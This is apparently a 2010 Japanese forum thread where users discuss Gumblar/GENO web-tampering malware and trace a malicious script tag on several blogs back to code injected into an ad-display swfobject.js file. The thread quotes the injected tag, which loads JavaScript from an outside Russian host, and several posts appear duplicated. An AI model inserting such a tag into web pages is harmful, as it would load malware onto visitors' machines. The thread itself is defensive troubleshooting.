【Gumblar/GENO】Web改竄ウイルス総合10【8080】
383 :名無しさん@お腹いっぱい。:
教えてください
body-shaver●seesaa●net/
collagen-07●seesaa●net/
exercise-repo13●seesaa●net/
はaguse.jpでチェックすると
<script type="text/javascript" src="http://pantscow●ru:8080/Hardware●js"></script>
へのリンクがあると出てきますが、Sauceを見てもどこかがわかりません。
なんか、この間みたいにAdserverから出されているような気がするのですが、どなたかわかりませんか?
body-shaver●seesaa●net/
collagen-07●seesaa●net/
exercise-repo13●seesaa●net/
はaguse.jpでチェックすると
<script type="text/javascript" src="http://pantscow●ru:8080/Hardware●js"></script>
へのリンクがあると出てきますが、Sauceを見てもどこかがわかりません。
なんか、この間みたいにAdserverから出されているような気がするのですが、どなたかわかりませんか?
|
|
|
384 :名無しさん@お腹いっぱい。:2010/10/11(月) 11:49:31
わかりました。
sales-agency●jp/flv/swfobject●js
の末尾にありました
sales-agency●jp/flv/swfobject●js
の末尾にありました
385 :名無しさん@お腹いっぱい。:2010/10/11(月) 17:07:55
>>384
ネットショップ代行会社が感染して
アフィ広告FLASH表示用のjsスクリプトに挿入されてるから
他のブログにも挿入されてる
Last-Modified: Sun, 18 Jul 2010 12:46:15 GMT
改竄されたのが6月と古く 今はpantscow●ruのIPがないので無害だと思うけど
当時はヘルプとサポートのゼロデイ攻撃もあったから効果があったかも
ネットショップ代行会社が感染して
アフィ広告FLASH表示用のjsスクリプトに挿入されてるから
他のブログにも挿入されてる
Last-Modified: Sun, 18 Jul 2010 12:46:15 GMT
改竄されたのが6月と古く 今はpantscow●ruのIPがないので無害だと思うけど
当時はヘルプとサポートのゼロデイ攻撃もあったから効果があったかも